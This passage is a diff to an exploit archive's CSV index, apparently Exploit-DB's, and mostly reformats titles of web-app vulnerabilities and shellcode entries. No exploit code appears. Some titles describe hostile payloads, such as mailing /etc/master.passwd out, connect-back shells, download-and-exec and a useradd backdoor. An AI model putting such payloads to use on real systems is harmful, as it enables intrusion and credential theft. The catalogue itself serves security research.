Script (page.php id) SQL Injection Vulnerability",2010-05-14,R3d-D3v!L,php,webapps,0 12598,platforms/php/webapps/12598.txt,"JE Ajax Event Calendar Local File Inclusion Vulnerability",2010-05-14,Valentin,php,webapps,0 -12599,platforms/php/webapps/12599.txt,"Heaven Soft CMS v 4.7 SQL Injection Vulnerability",2010-05-14,PrinceofHacking,php,webapps,0 +12599,platforms/php/webapps/12599.txt,"Heaven Soft CMS 4.7 - SQL Injection Vulnerability",2010-05-14,PrinceofHacking,php,webapps,0 12601,platforms/php/webapps/12601.txt,"Joomla Component JE Job Local File Inclusion Vulnerability",2010-05-14,Valentin,php,webapps,0 12602,platforms/windows/dos/12602.txt,"Firefox 3.6.3 & Safari 4.0.5 - Access Violation Exception and Unknown Exception",2010-05-14,"Fredrik Nordberg Almroth",windows,dos,0 12603,platforms/windows/dos/12603.py,"SmallFTPD FTP Server 1.0.3 - DELE Command DoS",2010-05-14,"Jeremiah Talamantes",windows,dos,0 @@ -11491,13 +11491,13 @@ id,file,description,date,author,platform,type,port 12605,platforms/windows/dos/12605.html,"IncrediMail (ImShExtU.dll) ActiveX Memory Corruption",2010-05-14,Lincoln,windows,dos,0 12606,platforms/asp/webapps/12606.txt,"SelfComposer CMS- SQL injection vulnerability",2010-05-14,Locu,asp,webapps,0 12607,platforms/php/webapps/12607.txt,"Joomla Component com_jequoteform - Local File Inclusion",2010-05-14,altbta,php,webapps,0 -12608,platforms/php/webapps/12608.txt,"Heaven Soft CMS v 4.7 (photogallery_open.php) SQL Injection Vulnerability",2010-05-14,CoBRa_21,php,webapps,0 +12608,platforms/php/webapps/12608.txt,"Heaven Soft CMS 4.7 - (photogallery_open.php) SQL Injection Vulnerability",2010-05-14,CoBRa_21,php,webapps,0 12609,platforms/php/webapps/12609.txt,"Alibaba Clone Platinum (buyer/index.php) SQL Injection Vulnerability",2010-05-14,GuN,php,webapps,0 12610,platforms/multiple/webapps/12610.txt,"VMware View Portal <= 3.1 XSS vulnerability",2010-05-14,"Alexey Sintsov",multiple,webapps,0 12611,platforms/php/webapps/12611.txt,"Joomla Component MS Comment LFI Vulnerability",2010-05-15,Xr0b0t,php,webapps,0 12612,platforms/php/webapps/12612.txt,"Alibaba Clone Platinum (about_us.php) SQL Injection Vulnerability",2010-05-15,CoBRa_21,php,webapps,0 12613,platforms/php/webapps/12613.txt,"CompactCMS 1.4.0 (tiny_mce) Remote File Upload",2010-05-15,ITSecTeam,php,webapps,0 -12614,platforms/windows/remote/12614.txt,"Safari 4.0.5 parent.close() Memory Corruption exploit (w/ASLR and DEP bypass)",2010-05-15,"Alexey Sintsov",windows,remote,0 +12614,platforms/windows/remote/12614.txt,"Safari 4.0.5 - parent.close() Memory Corruption exploit (ASLR and DEP bypass)",2010-05-15,"Alexey Sintsov",windows,remote,0 12615,platforms/php/webapps/12615.txt,"Joomla Component com_camp SQL Injection Vulnerability",2010-05-15,"Kernel Security Group",php,webapps,0 12617,platforms/php/webapps/12617.txt,"File Thingie 2.5.5 - File Security Bypass",2010-05-16,"Jeremiah Talamantes",php,webapps,0 12618,platforms/php/webapps/12618.txt,"Joomla Component simpledownload LFI Vulnerability",2010-05-16,Xr0b0t,php,webapps,0 @@ -11506,7 +11506,7 @@ id,file,description,date,author,platform,type,port 12621,platforms/windows/local/12621.pl,"Shellzip 3.0 Beta 3 - (.zip) 0day Stack Buffer Overflow PoC exploit",2010-05-16,Sud0,windows,local,0 12623,platforms/php/webapps/12623.txt,"Joomla Component simpledownload Local File Disclosure",2010-05-16,altbta,php,webapps,0 12624,platforms/php/webapps/12624.txt,"LinPHA <= 1.3.2 - (rotate.php) Remote Command Execution Vulnerability",2010-05-16,"Sn!pEr.S!Te hacker",php,webapps,0 -12628,platforms/php/webapps/12628.txt,"EgO v0.7b (fckeditor) Remote File Upload",2010-05-16,ITSecTeam,php,webapps,0 +12628,platforms/php/webapps/12628.txt,"EgO 0.7b - (fckeditor) Remote File Upload",2010-05-16,ItSecTeam,php,webapps,0 12629,platforms/php/webapps/12629.txt,"Tainos Multiple Vulnerabilities",2010-05-16,XroGuE,php,webapps,0 12630,platforms/php/webapps/12630.txt,"I-Vision CMS XSS, SQL injection vulnerability",2010-05-16,Ariko-Security,php,webapps,0 12631,platforms/php/webapps/12631.txt,"Tainos Webdesign (All Scripts) SQL/XSS/HTML Injection Vulnerability",2010-05-17,CoBRa_21,php,webapps,0 @@ -11522,7 +11522,7 @@ id,file,description,date,author,platform,type,port 12642,platforms/php/webapps/12642.txt,"phpMyAdmin 2.6.3-pl1 Cross Site Scripting and Full Path",2010-05-18,cp77fk4r,php,webapps,0 12643,platforms/php/webapps/12643.pl,"ChillyCMS Blind Sql Injection",2010-05-18,IHTeam,php,webapps,0 12644,platforms/php/webapps/12644.txt,"WebJaxe Sql Injection",2010-05-18,IHTeam,php,webapps,0 -12645,platforms/php/webapps/12645.txt,"TS Special Edition <= 7.0 Multiple Vulnerabilities",2010-05-18,IHTeam,php,webapps,0 +12645,platforms/php/webapps/12645.txt,"TS Special Edition <= 7.0 - Multiple Vulnerabilities",2010-05-18,IHTeam,php,webapps,0 12646,platforms/php/webapps/12646.txt,"B-Hind CMS (tiny_mce) Remote File Upload",2010-05-18,"innrwrld and h00die",php,webapps,0 12647,platforms/php/webapps/12647.txt,"Webloader 7 - 8 (vid) SQL Injection Vulnerability",2010-05-18,ByEge,php,webapps,0 12648,platforms/php/webapps/12648.txt,"Joomla Component com_packages SQL Injection Vulnerability",2010-05-18,"Kernel Security Group",php,webapps,0 @@ -11550,8 +11550,8 @@ id,file,description,date,author,platform,type,port 12674,platforms/php/webapps/12674.txt,"webYourPhotos <= 6.05 - (index.php) Remote File Inclusion Vulnerability",2010-05-20,"Sn!pEr.S!Te hacker",php,webapps,0 12676,platforms/php/webapps/12676.txt,"Open-AudIT - Multiple vulnerabilities",2010-05-21,"Sébastien Duquette",php,webapps,0 12677,platforms/windows/local/12677.html,"Rumba FTP Client FTPSFtp.dll 4.2.0.0 - OpenSession() Buffer Overflow",2010-05-21,sinn3r,windows,local,0 -12679,platforms/windows/webapps/12679.txt,"3Com* iMC (Intelligent Management Center) Unauthenticated File Retrieval (traversal)",2010-05-21,"Richard Brain",windows,webapps,0 -12680,platforms/windows/webapps/12680.txt,"3Com* iMC (Intelligent Management Center) Various XSS and Information Disclosure Flaws",2010-05-21,"Richard Brain",windows,webapps,0 +12679,platforms/windows/webapps/12679.txt,"3Com* iMC (Intelligent Management Center) - Unauthenticated File Retrieval (traversal)",2010-05-21,"Richard Brain",windows,webapps,0 +12680,platforms/windows/webapps/12680.txt,"3Com* iMC (Intelligent Management Center) - Various XSS and Information Disclosure Flaws",2010-05-21,"Richard Brain",windows,webapps,0 12683,platforms/windows/dos/12683.pl,"Solarwinds 10.4.0.10 TFTP DOS",2010-05-21,Nullthreat,windows,dos,69 12684,platforms/php/webapps/12684.txt,"ConPresso 4.0.7 SQL Injection Vulnerability",2010-05-21,Gamoscu,php,webapps,0 12686,platforms/php/webapps/12686.txt,"Online University (Auth Bypass) SQL Injection Vulnerability",2010-05-21,cr4wl3r,php,webapps,0 @@ -11572,7 +11572,7 @@ id,file,description,date,author,platform,type,port 12701,platforms/asp/webapps/12701.txt,"Rave Creations/UHM (artists.asp) SQL Injection Vulnerability",2010-05-22,Ra3cH,asp,webapps,0 12702,platforms/php/webapps/12702.php,"ECShop Search.php SQL Injection Exploit",2010-05-22,Jannock,php,webapps,0 12703,platforms/php/webapps/12703.txt,"Recipes Website 1.0 SQL Injection",2010-05-22,Mr.ThieF,php,webapps,0 -12704,platforms/windows/dos/12704.txt,"Media Player Classic - v 1.3.1774.0 (.rm file) buffer Overflow poc",2010-05-23,"sniper ip",windows,dos,0 +12704,platforms/windows/dos/12704.txt,"Media Player Classic 1.3.1774.0 - (.rm file) buffer Overflow poc",2010-05-23,"sniper ip",windows,dos,0 12706,platforms/php/webapps/12706.txt,"MMA Creative Design SQL Injection Vulnerability",2010-05-23,XroGuE,php,webapps,0 12707,platforms/php/webapps/12707.txt,"runt-communications Design SQL Injection Vulnerability",2010-05-23,XroGuE,php,webapps,0 12709,platforms/php/webapps/12709.txt,"webperformance Ecommerce SQL Vulnerability",2010-05-23,cyberlog,php,webapps,0 @@ -11593,7 +11593,7 @@ id,file,description,date,author,platform,type,port 12724,platforms/php/webapps/12724.php,"WebAsys blindSQL-inj exploit",2010-05-24,zsh.shell,php,webapps,0 12725,platforms/php/webapps/12725.txt,"ALSCO CMS SQL Injection Vulnerabilities",2010-05-24,PrinceofHacking,php,webapps,0 12726,platforms/php/webapps/12726.txt,"REvolution <= 10.02 CSRF (Cross-Site Request Forgery)",2010-05-24,"High-Tech Bridge SA",php,webapps,0 -12727,platforms/php/webapps/12727.txt,"LiSK CMS v 4.4 SQL Injection Vulnerability",2010-05-24,"High-Tech Bridge SA",php,webapps,0 +12727,platforms/php/webapps/12727.txt,"LiSK CMS 4.4 - SQL Injection Vulnerability",2010-05-24,"High-Tech Bridge SA",php,webapps,0 12728,platforms/windows/webapps/12728.txt,"Microsoft Outlook Web Access (OWA) 8.2.254.0 - Information Disclosure vulnerability",2010-05-24,"Praveen Darshanam",windows,webapps,0 12729,platforms/php/webapps/12729.txt,"Blox CMS SQL Injection Vulnerability",2010-05-24,CoBRa_21,php,webapps,0 12730,platforms/multiple/webapps/12730.txt,"ProWeb Design SQL Injection Vulnerability",2010-05-24,cyberlog,multiple,webapps,0 @@ -11646,8 +11646,8 @@ id,file,description,date,author,platform,type,port 12793,platforms/php/webapps/12793.txt,"Cosmos Solutions cms SQL Injection Vulnerability",2010-05-29,cyberlog,php,webapps,0 12794,platforms/php/webapps/12794.txt,"Cosmos Solutions cms SQL Injection Vulnerability (id= / page=)",2010-05-29,Gendenk,php,webapps,0 12796,platforms/php/webapps/12796.txt,"Joomla Component BF Quiz SQL Injection Exploit",2010-05-29,"Valentin Hoebel",php,webapps,0 -12797,platforms/php/webapps/12797.txt,"(Webiz) local SHELL Upload Vulnerability",2010-05-29,kannibal615,php,webapps,0 -12798,platforms/php/webapps/12798.txt,"(Webiz) SQL Injection Vulnerability",2010-05-29,kannibal615,php,webapps,0 +12797,platforms/php/webapps/12797.txt,"Webiz - Local Shell Upload Vulnerability",2010-05-29,kannibal615,php,webapps,0 +12798,platforms/php/webapps/12798.txt,"Webiz - SQL Injection Vulnerability",2010-05-29,kannibal615,php,webapps,0 12801,platforms/php/webapps/12801.txt,"Oscommerce Online Merchant 2.2 - File Disclosure And Admin ByPass",2010-05-30,Flyff666,php,webapps,0 12803,platforms/windows/local/12803.html,"IP2location.dll 1.0.0.1 - Function Initialize() Buffer Overflow",2010-05-30,sinn3r,windows,local,0 12804,platforms/multiple/remote/12804.txt,"nginx [engine x] http server <= 0.6.36 Path Draversal",2010-05-30,cp77fk4r,multiple,remote,0 @@ -11666,7 +11666,7 @@ id,file,description,date,author,platform,type,port 12818,platforms/php/webapps/12818.txt,"e107 0.7.21 full Mullti (RFI/XSS) Vulnerabilities",2010-05-31,"indoushka salah el ddine",php,webapps,0 12819,platforms/php/webapps/12819.txt,"Persian E107 XSS Vulnerability",2010-05-31,"indoushka salah el ddine",php,webapps,0 12820,platforms/php/webapps/12820.txt,"Visitor Logger (banned.php) Remote File Include Vulnerability",2010-05-31,bd0rk,php,webapps,0 -12821,platforms/windows/local/12821.py,"Mediacoder v0.7.3.4672 SEH Exploit",2010-05-31,Stoke,windows,local,0 +12821,platforms/windows/local/12821.py,"Mediacoder 0.7.3.4672 - SEH Exploit",2010-05-31,Stoke,windows,local,0 12822,platforms/php/webapps/12822.txt,"Joomla Component com_jsjobs SQL Injection Vulnerability",2010-05-31,d0lc3,php,webapps,0 12823,platforms/php/webapps/12823.txt,"musicbox sql injection",2010-05-31,titanichacker,php,webapps,0 12833,platforms/asp/webapps/12833.txt,"Patient folder (THEME ASP) Local SQL Injection Vulnerability",2010-05-31,"SA H4x0r",asp,webapps,0 @@ -11704,13 +11704,11 @@ id,file,description,date,author,platform,type,port 13250,platforms/bsd_x86/shellcode/13250.c,"bsd/x86 break chroot 45 bytes",2004-09-26,"Matias Sedalo",bsd_x86,shellcode,0 13251,platforms/bsd_x86/shellcode/13251.c,"bsd/x86 execve /bin/sh Crypt /bin/sh 49 bytes",2004-09-26,dev0id,bsd_x86,shellcode,0 13252,platforms/bsd_x86/shellcode/13252.c,"bsd/x86 execve /bin/sh ENCRYPT* 57 bytes",2004-09-26,"Matias Sedalo",bsd_x86,shellcode,0 -13253,platforms/bsd_x86/shellcode/13253.c,"bsd/x86 execve /bin/sh ENCRYPT* 57 bytes",2004-09-26,"Matias Sedalo",bsd_x86,shellcode,0 13254,platforms/bsd_x86/shellcode/13254.c,"bsd/x86 connect 93 bytes",2004-09-26,dev0id,bsd_x86,shellcode,0 13255,platforms/bsd_x86/shellcode/13255.c,"bsd/x86 cat /etc/master.passwd | mail [email] 92 bytes",2004-09-26,"Matias Sedalo",bsd_x86,shellcode,0 13256,platforms/bsd_x86/shellcode/13256.c,"bsd/x86 reverse portbind 129 bytes",2004-09-26,"Sinan Eren",bsd_x86,shellcode,0 13257,platforms/bsdi_x86/shellcode/13257.txt,"bsdi/x86 execve /bin/sh 45 bytes",2004-09-26,duke,bsdi_x86,shellcode,0 13258,platforms/bsdi_x86/shellcode/13258.txt,"bsdi/x86 execve /bin/sh 46 bytes",2004-09-26,vade79,bsdi_x86,shellcode,0 -13259,platforms/bsdi_x86/shellcode/13259.txt,"bsdi/x86 execve /bin/sh 46 bytes",2004-09-26,vade79,bsdi_x86,shellcode,0 13260,platforms/bsdi_x86/shellcode/13260.c,"bsdi/x86 execve /bin/sh toupper evasion 97 bytes",2004-09-26,n/a,bsdi_x86,shellcode,0 13261,platforms/freebsd_x86/shellcode/13261.txt,"FreeBSD i386/AMD64 Execve /bin/sh - Anti-Debugging",2009-04-13,c0d3_z3r0,freebsd_x86,shellcode,0 13262,platforms/freebsd_x86/shellcode/13262.txt,"freebsd/x86 setreuid, execve(pfctl -d) 56 bytes",2008-09-12,suN8Hclf,freebsd_x86,shellcode,0 @@ -11724,7 +11722,7 @@ id,file,description,date,author,platform,type,port 13270,platforms/freebsd_x86/shellcode/13270.c,"freebsd/x86 portbind 4883 with auth shellcode",2006-07-19,MahDelin,freebsd_x86,shellcode,0 13271,platforms/freebsd_x86/shellcode/13271.c,"freebsd/x86 reboot(RB_AUTOBOOT) Shellcode 7 bytes",2006-04-19,IZ,freebsd_x86,shellcode,0 13272,platforms/freebsd_x86/shellcode/13272.c,"freebsd/x86 execve /bin/sh 23 bytes",2006-04-14,IZ,freebsd_x86,shellcode,0 -13273,platforms/freebsd_x86/shellcode/13273.c,"freebsd/x86 execve /bin/sh 23 bytes",2004-09-26,marcetam,freebsd_x86,shellcode,0 +13273,platforms/freebsd_x86/shellcode/13273.c,"freebsd/x86 execve /bin/sh 23 bytes (2)",2004-09-26,marcetam,freebsd_x86,shellcode,0 13274,platforms/freebsd_x86/shellcode/13274.c,"freebsd/x86 execve /bin/sh 37 bytes",2004-09-26,preedator,freebsd_x86,shellcode,0 13275,platforms/freebsd_x86/shellcode/13275.c,"freebsd/x86 kldload /tmp/o.o 74 bytes",2004-09-26,dev0id,freebsd_x86,shellcode,0 13276,platforms/freebsd_x86/shellcode/13276.c,"freebsd/x86 chown 0:0 , chmod 6755 & execve /tmp/sh 44 bytes",2004-09-26,"Claes Nyberg",freebsd_x86,shellcode,0 @@ -11845,7 +11843,7 @@ id,file,description,date,author,platform,type,port 13391,platforms/lin_x86/shellcode/13391.c,"linux/x86 eject/close cd-rom loop (follows /dev/cdrom symlink) 45 bytes",2006-01-21,izik,lin_x86,shellcode,0 13392,platforms/lin_x86/shellcode/13392.c,"linux/x86 chmod(/etc/shadow, 0666) + exit() 32 bytes",2006-01-21,izik,lin_x86,shellcode,0 13393,platforms/lin_x86/shellcode/13393.c,"linux/x86 connect-back shellcode 127.0.0.1:31337/tcp 74 bytes",2006-01-21,izik,lin_x86,shellcode,0 -13394,platforms/lin_x86/shellcode/13394.c,"linux/x86 normal exit w/ random (so to speak) return value 5 bytes",2006-01-21,izik,lin_x86,shellcode,0 +13394,platforms/lin_x86/shellcode/13394.c,"linux/x86 normal exit with random (so to speak) return value 5 bytes",2006-01-21,izik,lin_x86,shellcode,0 13395,platforms/lin_x86/shellcode/13395.c,"linux/x86 getppid() + execve(/proc/pid/exe) 51 bytes",2006-01-21,izik,lin_x86,shellcode,0 13396,platforms/lin_x86/shellcode/13396.c,"linux/x86 quick (yet conditional, eax != 0 and edx == 0) exit 4 bytes",2006-01-21,izik,lin_x86,shellcode,0 13397,platforms/lin_x86/shellcode/13397.c,"linux/x86 reboot() - 20 bytes",2006-01-21,izik,lin_x86,shellcode,0 @@ -11858,7 +11856,7 @@ id,file,description,date,author,platform,type,port 13404,platforms/lin_x86/shellcode/13404.c,"linux/x86 if(read(fd,buf,512)<=2) _exit(1) else buf(); 29 bytes",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0 13405,platforms/lin_x86/shellcode/13405.c,"linux/x86 _exit(1); 7 bytes",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0 13406,platforms/lin_x86/shellcode/13406.c,"linux/x86 read(0,buf,2541); chmod(buf,4755); 23 bytes",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0 -13407,platforms/lin_x86/shellcode/13407.c,"linux/x86 write(0,""Hello core!\n"",12); (w/optional 7 byte exit) 36 bytes",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0 +13407,platforms/lin_x86/shellcode/13407.c,"linux/x86 write(0,""Hello core!\n"",12); (with optional 7 byte exit) 36 bytes",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0 13408,platforms/lin_x86/shellcode/13408.c,"linux/x86 snoop /dev/dsp shellcode 172 bytes",2005-11-04,phar,lin_x86,shellcode,0 13409,platforms/lin_x86/shellcode/13409.c,"linux/x86 /bin/sh Standard Opcode Array Payload 21 Bytes",2005-09-15,c0ntex,lin_x86,shellcode,0 13410,platforms/lin_x86/shellcode/13410.s,"linux/x86 examples of long-term payloads hide-wait-change (.s)",2005-09-09,xort,lin_x86,shellcode,0 @@ -11957,7 +11955,7 @@ id,file,description,date,author,platform,type,port 13503,platforms/unixware/shellcode/13503.txt,"Unixware execve /bin/sh 95 bytes",2004-09-26,k2,unixware,shellcode,0 13504,platforms/win32/shellcode/13504.asm,"Windows x86 null-free bindshell for Windows 5.0-7.0 all service packs",2009-07-27,SkyLined,win32,shellcode,0 13505,platforms/win32/shellcode/13505.c,"win32/xp sp2 (En) cmd.exe 23 bytes",2009-07-17,Stack,win32,shellcode,0 -13507,platforms/win32/shellcode/13507.txt,"win32 SEH omelet shellcode v0.1",2009-03-16,SkyLined,win32,shellcode,0 +13507,platforms/win32/shellcode/13507.txt,"win32 SEH omelet shellcode 0.1",2009-03-16,SkyLined,win32,shellcode,0 13508,platforms/win32/shellcode/13508.asm,"win32 telnetbind by winexec 111 bytes",2009-02-27,DATA_SNIPER,win32,shellcode,0 13509,platforms/win32/shellcode/13509.c,"win32 PEB!NtGlobalFlags shellcode 14 bytes",2009-02-24,Koshi,win32,shellcode,0 13510,platforms/win32/shellcode/13510.c,"win32 XP sp2 (FR) Sellcode cmd.exe 32 bytes",2009-02-20,Stack,win32,shellcode,0 @@ -11974,7 +11972,7 @@ id,file,description,date,author,platform,type,port 13521,platforms/win32/shellcode/13521.asm,"win32 WinExec() Command Parameter 104+ bytes",2006-01-24,Weiss,win32,shellcode,0 13522,platforms/win32/shellcode/13522.c,"win32 Download & Exec Shellcode 226 bytes+",2005-12-23,darkeagle,win32,shellcode,0 13523,platforms/win32/shellcode/13523.c,"Windows NT/2k/XP useradd shellcode for russian systems 318 bytes",2005-10-28,darkeagle,win32,shellcode,0 -13524,platforms/win32/shellcode/13524.txt,"Windows 9x/NT/2k/XP Reverse Generic Shellcode w/o Loader 249 bytes",2005-08-16,"Matthieu Suiche",win32,shellcode,0 +13524,platforms/win32/shellcode/13524.txt,"Windows 9x/NT/2k/XP Reverse Generic Shellcode without Loader 249 bytes",2005-08-16,"Matthieu Suiche",win32,shellcode,0 13525,platforms/win32/shellcode/13525.c,"Windows 9x/NT/2k/XP PEB method 29 bytes",2005-07-26,loco,win32,shellcode,0 13526,platforms/win32/shellcode/13526.c,"Windows 9x/NT/2k/XP PEB method 31 bytes",2005-01-26,twoci,win32,shellcode,0 13527,platforms/win32/shellcode/13527.c,"Windows 9x/NT/2k/XP PEB method 35 bytes",2005-01-09,oc192,win32,shellcode,0 @@ -12084,14 +12082,14 @@ id,file,description,date,author,platform,type,port 13751,platforms/php/webapps/13751.txt,"greeting card Remote Upload Vulnerability",2010-06-06,Mr.Benladen,php,webapps,0 13752,platforms/php/webapps/13752.txt,"reVou Twitter Clone Beta 2.0 SQLi and Xss vulnerability",2010-06-06,Sid3^effects,php,webapps,0 13754,platforms/multiple/webapps/13754.txt,"JForum 2.1.8 bookmarks CSRF & XSS",2010-06-07,"Adam Baldwin",multiple,webapps,0 -13756,platforms/windows/local/13756.py,"VUPlayer <= 2.49 - (.m3u) Universal buffer overflow exploit w/ DEP bypass",2010-06-07,mr_me,windows,local,0 +13756,platforms/windows/local/13756.py,"VUPlayer <= 2.49 - (.m3u) Universal buffer overflow exploit (DEP bypass)",2010-06-07,mr_me,windows,local,0 13760,platforms/windows/local/13760.py,"Audio Converter 8.1 0day Stack Buffer Overflow PoC exploit",2010-06-07,Sud0,windows,local,0 13761,platforms/windows/local/13761.pl,"Easy CD-DA Recorder 2007 SEH Buffer Overflow",2010-06-07,chap0,windows,local,0 13762,platforms/php/webapps/13762.txt,"CommonSense CMS Sql Injection Vulnerability",2010-06-07,Pokeng,php,webapps,0 13763,platforms/windows/local/13763.pl,"Audio Converter 8.1 0day Stack Buffer Overflow PoC exploit ROP/WPM",2010-06-07,Sud0,windows,local,0 13766,platforms/php/webapps/13766.txt,"Authentication Bypass in Home of MCLogin System",2010-06-08,"L0rd CrusAd3r",php,webapps,0 13767,platforms/windows/local/13767.c,"SureThing CD Labeler (m3u/pls) - Unicode Stack Overflow PoC Exploit",2010-06-08,mr_me,windows,local,0 -13768,platforms/php/local/13768.py,"Castripper 2.50.70 (.pls) stack buffer overflow w/ DEP bypass exploit",2010-06-08,mr_me,php,local,0 +13768,platforms/php/local/13768.py,"Castripper 2.50.70 - (.pls) stack buffer overflow DEP bypass exploit",2010-06-08,mr_me,php,local,0 13769,platforms/php/webapps/13769.txt,"CafeEngine CMS 2.3 - SQLI Vulnerability",2010-06-08,Sid3^effects,php,webapps,0 13770,platforms/php/webapps/13770.txt,"Hotel / Resort Site Script with OnLine Reservation System",2010-06-08,"L0rd CrusAd3r",php,webapps,0 13771,platforms/php/webapps/13771.txt,"EMO Realty Manager SQLi Vulnerable",2010-06-08,"L0rd CrusAd3r",php,webapps,0 @@ -12111,7 +12109,7 @@ id,file,description,date,author,platform,type,port 13786,platforms/php/webapps/13786.txt,"PGAUTOPro SQLi and XSS Vulnerability",2010-06-09,Sid3^effects,php,webapps,0 13787,platforms/multiple/remote/13787.txt,"Adobe Flash and Reader - 0day Exploit PoC (from the wild)",2010-06-09,unknown,multiple,remote,0 13788,platforms/asp/webapps/13788.txt,"Web Wiz Forums 9.68 SQLi Vulnerability",2010-06-09,Sid3^effects,asp,webapps,0 -13789,platforms/asp/webapps/13789.txt,"Virtual Real Estate Manager V 3.5 SQLi Vulnerability",2010-06-09,Sid3^effects,asp,webapps,0 +13789,platforms/asp/webapps/13789.txt,"Virtual Real Estate Manager 3.5 - SQLi Vulnerability",2010-06-09,Sid3^effects,asp,webapps,0 13790,platforms/asp/webapps/13790.txt,"iClone SQL Injection Vulnerability",2010-06-09,Sid3^effects,asp,webapps,0 13792,platforms/php/webapps/13792.txt,"Joomla component cinema SQL injection Vulnerability",2010-06-09,Sudden_death,php,webapps,0 13793,platforms/asp/webapps/13793.txt,"Online Notebook Manager SQLi Vulnerability",2010-06-09,"L0rd CrusAd3r",asp,webapps,0 @@ -12149,18 +12147,18 @@ id,file,description,date,author,platform,type,port 13829,platforms/php/webapps/13829.txt,"Site to Store Automobile - Motorcycle - Boat SQL Injection Vulnerability",2010-06-11,"L0rd CrusAd3r",php,webapps,0 13830,platforms/php/webapps/13830.txt,"DaLogin Multiple Vulnerabilities",2010-06-11,hc0,php,webapps,0 13831,platforms/php/webapps/13831.txt,"Full Site for Restaurant SQL Injection Vulnerability",2010-06-11,"L0rd CrusAd3r",php,webapps,0 -13832,platforms/php/webapps/13832.txt,"ardeaCore 2.2 Remote File Inclusion Vulnerability",2010-06-11,cr4wl3r,php,webapps,0 +13832,platforms/php/webapps/13832.txt,"ardeacore 2.2 - Remote File Inclusion Vulnerability",2010-06-11,cr4wl3r,php,webapps,0 13833,platforms/php/webapps/13833.txt,"Parallels System Automation (PSA) Local File Inclusion Vulnerability",2010-06-11,"Pouya Daneshmand",php,webapps,0 13834,platforms/windows/remote/13834.html,"Sygate Personal Firewall 5.6 build 2808 ActiveX with DEP bypass",2010-06-11,Lincoln,windows,remote,0 13835,platforms/php/webapps/13835.txt,"DaLogin 2.2 (FCKeditor) Remote Arbitrary File Upload Exploit",2010-06-11,eidelweiss,php,webapps,0 13836,platforms/windows/dos/13836.py,"Solarwinds 10.4.0.13 Denial of Service Exploit",2010-06-12,Nullthreat,windows,dos,0 13837,platforms/windows/dos/13837.pl,"Media Player Classic 1.3.1774.0 - (mpcpl) Local DoS (PoC) (0day)",2010-06-12,R3d-D3v!L,windows,dos,0 -13838,platforms/windows/dos/13838.pl,"CP3 Studio PC Version Denial of Service",2010-06-12,chap0,windows,dos,0 +13838,platforms/windows/dos/13838.pl,"CP3 Studio PC Version - Denial of Service",2010-06-12,chap0,windows,dos,0 13840,platforms/asp/webapps/13840.txt,"VU Case Manager Authentication Bypass",2010-06-12,"L0rd CrusAd3r",asp,webapps,0 13841,platforms/asp/webapps/13841.txt,"VU Mass Mailer Authentication Bypass",2010-06-12,"L0rd CrusAd3r",asp,webapps,0 13842,platforms/asp/webapps/13842.txt,"VU Web Visitor Analyst Authentication Bypass",2010-06-12,"L0rd CrusAd3r",asp,webapps,0 13843,platforms/asp/webapps/13843.txt,"BrightSuite Groupware SQL Injection Vulnerability",2010-06-12,"L0rd CrusAd3r",asp,webapps,0 -13844,platforms/php/webapps/13844.pl,"Collabtive v0.6.3 Multiple Vulnerabilities",2010-06-12,DNX,php,webapps,0 +13844,platforms/php/webapps/13844.pl,"Collabtive 0.6.3 - Multiple Vulnerabilities",2010-06-12,DNX,php,webapps,0 13845,platforms/php/webapps/13845.txt,"Yamamah (news) SQL Injection and Source Code Disclosure Vulnerability",2010-06-12,anT!-Tr0J4n,php,webapps,0 13846,platforms/asp/webapps/13846.txt,"BDSMIS TraX with Payroll SQL Injection Vulnerability",2010-06-12,"L0rd CrusAd3r",asp,webapps,0 13847,platforms/php/webapps/13847.txt,"phpplanner XSS / SQL Vulnerability",2010-06-12,anT!-Tr0J4n,php,webapps,0 @@ -12228,8 +12226,8 @@ id,file,description,date,author,platform,type,port 13921,platforms/windows/dos/13921.c,"PowerZip 7.21 (Build 4010) Stack Buffer Overflow",2010-06-18,"fl0 fl0w",windows,dos,0 13922,platforms/php/webapps/13922.txt,"Joomla Component com_joomdocs XSS Vulnerability",2010-06-18,Sid3^effects,php,webapps,0 13923,platforms/php/webapps/13923.txt,"Joomla Component Answers 2.3beta - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0 -13925,platforms/php/webapps/13925.txt,"Joomla Component Ozio Gallery 2 Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0 -13926,platforms/php/webapps/13926.txt,"Joomla Component Listbingo 1.3 Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0 +13925,platforms/php/webapps/13925.txt,"joomla component ozio gallery 2 - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0 +13926,platforms/php/webapps/13926.txt,"joomla component listbingo 1.3 - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0 13927,platforms/php/webapps/13927.txt,"MarketSaz remote file Upload Vulnerability",2010-06-18,NetQurd,php,webapps,0 13929,platforms/php/webapps/13929.txt,"Banner Management Script SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps,0 13930,platforms/php/webapps/13930.txt,"Shopping Cart Script with Affiliate Program SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps,0 @@ -12258,7 +12256,7 @@ id,file,description,date,author,platform,type,port 13956,platforms/php/webapps/13956.txt,"Joomla Hot Property com_jomestate RFI Vulnerability",2010-06-21,Sid3^effects,php,webapps,0 13957,platforms/php/webapps/13957.txt,"myUPB <= 2.2.6 - Multiple Vulnerabilities",2010-06-21,altbta,php,webapps,0 13958,platforms/windows/dos/13958.txt,"Sysax Multi Server (SFTP module) Multiple Commands DoS Vulnerabilities",2010-06-21,leinakesi,windows,dos,0 -13959,platforms/windows/dos/13959.c,"Teamspeak <= 3.0.0-beta25 Multiple Remote Vulnerabilities",2010-06-21,"Luigi Auriemma",windows,dos,9987 +13959,platforms/windows/dos/13959.c,"teamspeak <= 3.0.0-beta25 Multiple Vulnerabilities",2010-06-21,"Luigi Auriemma",windows,dos,9987 13960,platforms/php/webapps/13960.html,"PHPWCMS 1.4.5 r398 Cross Site Request Forgery Vulnerability",2010-06-21,"Jeremiah Talamantes",php,webapps,0 13961,platforms/php/webapps/13961.txt,"Alpin CMS 1.0 - SQL Injection Vulnerability",2010-06-21,"Th3 RDX",php,webapps,0 13962,platforms/php/webapps/13962.txt,"Joomla Component JomSocial 1.6.288 Multiple XSS",2010-06-21,jdc,php,webapps,0 @@ -12285,7 +12283,7 @@ 